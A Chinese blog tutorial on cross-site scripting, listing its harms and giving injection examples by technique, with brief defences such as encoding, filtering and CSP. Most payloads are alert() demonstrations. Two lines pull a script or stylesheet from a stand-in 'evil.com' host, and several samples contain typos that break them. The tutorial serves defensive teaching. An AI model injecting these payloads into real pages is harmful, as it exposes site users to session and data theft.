Web前端安全——XSS攻击与防御

最新推荐文章于 2024-03-03 13:30:00 发布
最新推荐文章于 2024-03-03 13:30:00 发布
阅读量2.4k 收藏 3
点赞数
分类专栏: web前端 文章标签: 安全 web前端 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37268201/article/details/71091342
版权

跨站脚本攻击简称 XSS (Cross-Site Scriptting),是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

XSS攻击的危害:

1、盗取各类用户帐号权限(控制所盗窃权限数据内容),如机器登录帐号、用户网银帐号、各类管理员帐号

2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力

3、基于XSS的跨站业务请求(如:非法转账、非法下单、非法转载/发表内容、发送电子邮件、利用管理员身份提权挂马、控制受害者机器向其它网站发起攻击等)

4、形成持久化APT攻击,长期控制网站业务中枢

5、利用跨站业务形成蠕虫病毒式传播

6、劫持网站,劫持后可用于钓鱼、伪装、跳转、挂广告等,属挂马类型

XSS攻击注入方式与示例:

  • 通过html属性构造(src、lowsrc、dynsrc、href、bgsound、action、background……)
    示例:
<img src = "javascript:alert(/xss/)" width = 100>
  • 通过html属性事件构造(onerror, onclick、onmounseover……)
    示例:
1. <img src = "#" onerror = alert(/xss/)>
2. <div onclick = alert(/xss/)></div>
  • 通过css构造(background-img: url、expression、link-href、@import)
    示例:
1. <div style = "background-img: url(javascript:alert

(/xss/));width:exprssion(alert('xss'));"></div>
2. <style>body{background-img: url("javascript:alert('xss')")}</style>
3. <link rel = "stylesheet" href="http://www.evil.com/attack.css">
4. <style>@import "javascript:alert('xss')"</style>
  • 通过JavaScript构造(eval()函数)、ASCII编码
    示例:
1. <script>eval("alert('xss')")</script>
2. <img src = "javascript:eval(String.fromChartCode

(97,108,101,114,116,40,39,88,83,83,39,41))">
  • 基于DOM(常用于有字数限制的输入框)
    示例:
字符串拼接:
<script>a='document.'</script>
<script>a=a+'write("'</script>
<script>a=a+'alert('</script>
<script>a=a+'/xss/)'</script>
<script>a=a+'")'</script>
<script>eval(a)</script>
  • 基于DOM型创建节点(创建document.write()、node.innerHTML、document.createElement……)
    示例:
 1. var b = document.createElement("script");
    b.src = "http://www/evil.com/xss.js";
 2. document.getElementsByTagName("head")[0].appendChild(z);

防御措施:
- 避免使用客户端数据,尽量服务端生成
- JavaScript变量输出时先编码
- XSS过滤(js-xss, http://jsxss.com
- CSP(Content Security Policy)

说明:CSP:通过在http响应头中加入相关指令告知浏览器,被保护页面仅允许加载和执行指令中限制的内容,不满足的资源与内容不执行或被客户端阻断。详见:https://content-security-policy.com

遇见小美好
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全XSS攻击防御小结
02-23
跨站脚本攻击(CrossSiteScripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起...
如何避免XSS攻击
狂欢的博客
08-25 830
前言 XSS 攻击:即跨站脚本攻击,它是 Web 程序中常见的漏洞。原理是攻击者往 Web 页面里插入恶意的脚本代码(css 代码、Javascript 代码等),当用户浏览该页面时,嵌入其中的脚本代码会被执行,从而达到恶意攻击用户的目的,如盗取用户 cookie、破坏页面结构、重定向到其他网站等。 预防: 1、获取用户的输入,不用innerHtml,用innerText. 2、预防 XSS 的核...
xss攻击-面向前端安全攻击 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
02-28 1265
文章目录
彻底理解前端安全面试题(1)—— XSS 攻击,3种XSS攻击详解,建议收藏(含源码)
最新发布
Karka_的博客
03-03 1029
xss 攻击的三种类型都用代码模拟了,我的仓库地址如下,欢迎查看内容较多,难免疏漏,如有问题,欢迎指正。这是一系列的文章,关于网络安全的内容还有 CSRF、CORS 和中间人攻击的内容没有总结,持续更新中,欢迎关注。第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
前端安全(一)XSS攻击原理及防范
qq_34416331的博客
12-18 2298
前端是直面用户的窗口,其安全性却是最容易被忽略的一环。本文将介绍: 一、什么是XSS攻击 1.1 定义 1.2 XSS攻击的危害 二、 XSS攻击类型 2.1 反射型攻击 2.2 存储型攻击 2.3 DOM型攻击 2.4 三种攻击类型的区别 三、 如何防范XSS攻击 3.1 设置Cookie HttpOnly 为 true 3.2 纯前端渲染 3.3 使用合适的转义库...
前端XSS脚本攻击
usejony的博客
12-08 949
前端 xss 攻击
前端安全XSS攻击
02-25
分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击...
前端安全——XSS攻击防御原理详解
qq_44197554的博客
12-13 5515
前端开发人员必备安全防范知识——XSS攻击防御,希望大家可以认识到xss攻击的危害
前端预防XSS攻击全攻略
前端小师姐迪迪_的博客
02-23 2182
前端如何预防XSS攻击XSS攻击做了哪些坏事?
前端安全XSS攻击详解
Ellis_li 的博客
10-22 1146
1.基本概念 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内...
前端应对xss进攻的一些方法
MrLiber的博客
03-16 2445
一提到前端安全性,必然要考虑到XSS攻击,那我们先来看下什么到底XSS攻击xss攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用...
基于vue搭建的网站如何防范XSS攻击
zsq199771的博客
06-16 966
基于vue搭建的网站如何防范XSS攻击
前端XSS攻击的三种方式
甘焕的博客
11-25 5211
针对HTML的script标签特性,对前端页面可以采取如下3中脚本注入方式。1. 添加script元素在页面中直接创建script元素,然后利用textContent特性进行脚本执行,如下: var script = document.createElement('script'); script.textContent='alert(100)'; // 立刻就会在页面进行执
【转】XSS的两种攻击方式及五种防御方式
tpriwwq的专栏
11-05 1840
XSS攻击介绍及防御方法
Web前端安全系列之:XSS攻防
qq_44005305的博客
01-15 839
Web 攻击技术的发展也可以分为几个阶段。在 Web 1.0 时代,人们更多的是关注服务器端动态脚本的安全问题,比如将一个可执行脚本(俗称 webshell)上传到服务器上,从而获得权限。后续有出现了SQL注入,SQL注入的出现是Web安全史上的一个里程碑,SQL注入漏洞至今仍然是Web安全领域中的一个重要组成部分。再后续另一个里程碑的安全问题问世--XSS(跨站脚本攻击)。伴随着 Web 2.0 的兴起,XSS、CSRF 等攻击已经变得更为强大。
前端安全系列(一):如何防止XSS攻击
Innocence_0的博客
12-31 1387
在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确:1.XSS 防范是后端 RD(研发人员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符进行转义,才能进行下一步操作。2.所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。如果你还不能确定答案,那么可以带着这些问题向下看,我们将逐步拆解问题。在 HTML 中内嵌的文本中,恶意内容以 script 标签形成注入。
前端安全之-XSS(跨站脚本攻击)详解
wb199811的博客
08-17 7772
xss跨站脚本攻击一.XSS的基本概念二、XSS攻击的主要途径三、XSS的分类反射型XSS存储型XSSDOM XSS防范措施利用 CSP利用 HttpOnly 一.XSS的基本概念 XSS又叫CSS (Cross Site Script) ,为了和css(层叠样式表)区分,我们通常称它为(xss)跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 xss是一种发生在web前端的漏洞,所以其危害的对象也主要
前端安全XSS的原理和防范
我可是小老虎的博客
10-11 833
前端安全 XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 XSS 漏洞的发生和修复 XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。 一个案例 某天,公司需要一个搜索页面,根据 URL 参数决定关键词的内容。小明很快把页面写好并且上线。代码如下: <input type="text" value="<%= getParameter("keyword") %&gt.
前端安全】JavaScript防XSS攻击
05-23
XSS(Cross-site scripting)攻击是指攻击者利用Web应用程序没有对用户提交的数据进行足够的验证和过滤,从而在Web页面中注入恶意脚本,当用户访问这些页面时,这些恶意脚本就会被执行,从而达到攻击者的目的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值